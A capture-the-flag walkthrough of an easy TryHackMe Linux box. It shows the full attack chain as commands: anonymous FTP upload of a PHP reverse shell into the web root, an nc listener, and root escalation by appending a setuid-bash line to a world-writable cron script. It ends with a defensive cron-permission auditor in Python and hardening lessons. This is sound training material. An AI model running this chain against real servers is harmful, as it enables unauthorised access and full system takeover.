
Box Info
| Field | Details |
|---|---|
| Platform | TryHackMe |
| Difficulty | Easy |
| OS | Linux |
| Skills | FTP, File Upload RCE, Cron Privesc |
Phase 1: Reconnaissance
```bash
# Full TCP port sweep with version and default-script detection
nmap -sV -sC -p- --min-rate 5000 10.10.X.X

# Results (trimmed):
# PORT   STATE SERVICE VERSION
# 21/tcp open  ftp     vsftpd 3.0.3
# 22/tcp open  ssh     OpenSSH 7.2p2
# 80/tcp open  http    Apache 2.4.18
```
Phase 2: FTP Anonymous Access
```bash
ftp 10.10.X.X
# Username: anonymous
# Password: (empty, any string is accepted for the anonymous account)
ftp> ls -la
# Found: notice.txt, important.jpg
ftp> get notice.txt
# Switch to binary mode before pulling the image if the client defaults to ASCII,
# otherwise the jpg arrives corrupted
ftp> get important.jpg
```
Phase 3: Web Enumeration
```bash
gobuster dir -u http://10.10.X.X -w /usr/share/wordlists/dirb/common.txt
# Found:
# /files (200) <- the same notice.txt and important.jpg from the FTP root are
#                 listed here, so /files and the anonymous FTP directory are
#                 the same path on disk and anything uploaded over FTP is served by Apache
```
Phase 4: RCE via PHP Shell Upload
```bash
# Upload a PHP reverse shell via FTP. Before uploading, edit shell.php so its
# callback IP is the attacker's VPN address and its port matches the listener (4444).
# The put succeeding also confirms that anonymous write access is enabled.
ftp 10.10.X.X
ftp> put shell.php

# Start listener
nc -lvnp 4444

# Trigger the shell via browser (Apache executes .php under /files, it does not just serve it):
# http://10.10.X.X/files/shell.php
```
We have a shell! Upgrade it to a proper TTY so that tab completion, `su` and editors work:
```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Optionally background the shell with Ctrl-Z, run `stty raw -echo; fg` locally, then press Enter
```
Phase 5: Privilege Escalation
```bash
# Check system cron jobs
cat /etc/crontab
# Found: a script run by root on a schedule, and the script file is world-writable
# (confirm with ls -l on the script and on its parent directory before relying on it)

# Append a line that sets the setuid bit on bash; the next run executes it as root
echo "chmod +s /bin/bash" >> /path/to/script.sh

# Wait for the cron interval to elapse, then check that /bin/bash shows the s bit
# -p keeps the effective uid (root) instead of dropping back to the real uid
/bin/bash -p
# root#
```
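Reading `/etc/crontab` by eye works on a small box, but the check a practitioner actually wants is "which root cron jobs reference a file or directory I can write to". The auditor below is an added example, not part of the original writeup: it parses system crontab syntax (five time fields, a user, then the command, plus `@reboot`-style entries), pulls every absolute path out of each command, and reports paths that are writable or that live in a writable directory (a missing or replaceable script is just as exploitable as a writable one). The sample crontab text is constructed for illustration; run it on the target and it reads the real `/etc/crontab` and `/etc/cron.d/`.

```python
"""Flag cron jobs whose command paths the current user can modify.

Added example, not from the original writeup. Covers /etc/crontab syntax:
  m h dom mon dow user command
  @reboot user command
"""
import glob
import os
import re
import shlex

# Six whitespace-separated fields, then the command (which may itself contain spaces)
CRON_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
VAR_RE = re.compile(r"^[A-Za-z_]\w*=")

# Constructed sample resembling a Debian/Ubuntu /etc/crontab
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /opt/backup.sh
@reboot         root    /usr/local/bin/cleanup.sh > /dev/null 2>&1
"""


def parse_system_crontab(text):
    """Return [(user, command)] for every job line; skip comments, blanks and VAR=value lines."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or VAR_RE.match(line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)  # @reboot user command
            if len(parts) == 3:
                jobs.append((parts[1], parts[2]))
            continue
        m = CRON_RE.match(line)
        if m:
            jobs.append((m.group(6), m.group(7)))
    return jobs


def script_paths(command):
    """Absolute paths mentioned in a command; /dev/* is skipped (redirect targets, always writable)."""
    try:
        words = shlex.split(command)
    except ValueError:  # unbalanced quotes in the crontab line
        words = command.split()
    return [w for w in words if w.startswith("/") and not w.startswith("/dev/")]


def writable_targets(jobs, access=os.access):
    """(user, path, reason) for each path that is writable, or whose parent directory is.

    `access` is injectable so the logic can be exercised without touching the filesystem.
    """
    findings = []
    for user, command in jobs:
        for path in script_paths(command):
            if access(path, os.W_OK):
                findings.append((user, path, "file writable"))
            elif access(os.path.dirname(path), os.W_OK):
                findings.append((user, path, "parent directory writable"))
    return findings


def audit_live_system():
    """Read the real crontab files on this host and report writable targets run as root."""
    text = ""
    for fname in ["/etc/crontab"] + sorted(glob.glob("/etc/cron.d/*")):
        try:
            with open(fname) as fh:
                text += fh.read() + "\n"
        except OSError:
            continue
    return [f for f in writable_targets(parse_system_crontab(text)) if f[0] == "root"]


if __name__ == "__main__":
    for user, path, reason in audit_live_system():
        print(f"[{user}] {path}: {reason}")
```

A path that is merely readable is not a finding; a writable parent directory is, because the script can be renamed away and replaced even when the file itself is root-owned (unless the directory has the sticky bit set).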
Flags
user.txt: THM{XXXXXXXXXXXXXXXXXX}
root.txt: THM{XXXXXXXXXXXXXXXXXX}
Lessons Learned
- Anonymous FTP should be disabled on production systems (`anonymous_enable=NO` in vsftpd.conf); if it must exist, never allow anonymous uploads (`anon_upload_enable` and `write_enable` off)
- An FTP upload directory that lives inside the web root, on a server that executes PHP, is unauthenticated remote code execution: any uploaded `.php` file runs as the web server user the moment it is requested
- A cron job that runs as root from a script (or a directory) that a low-privilege user can write to is a trivial privilege escalation; root-run scripts must be owned by root and writable only by root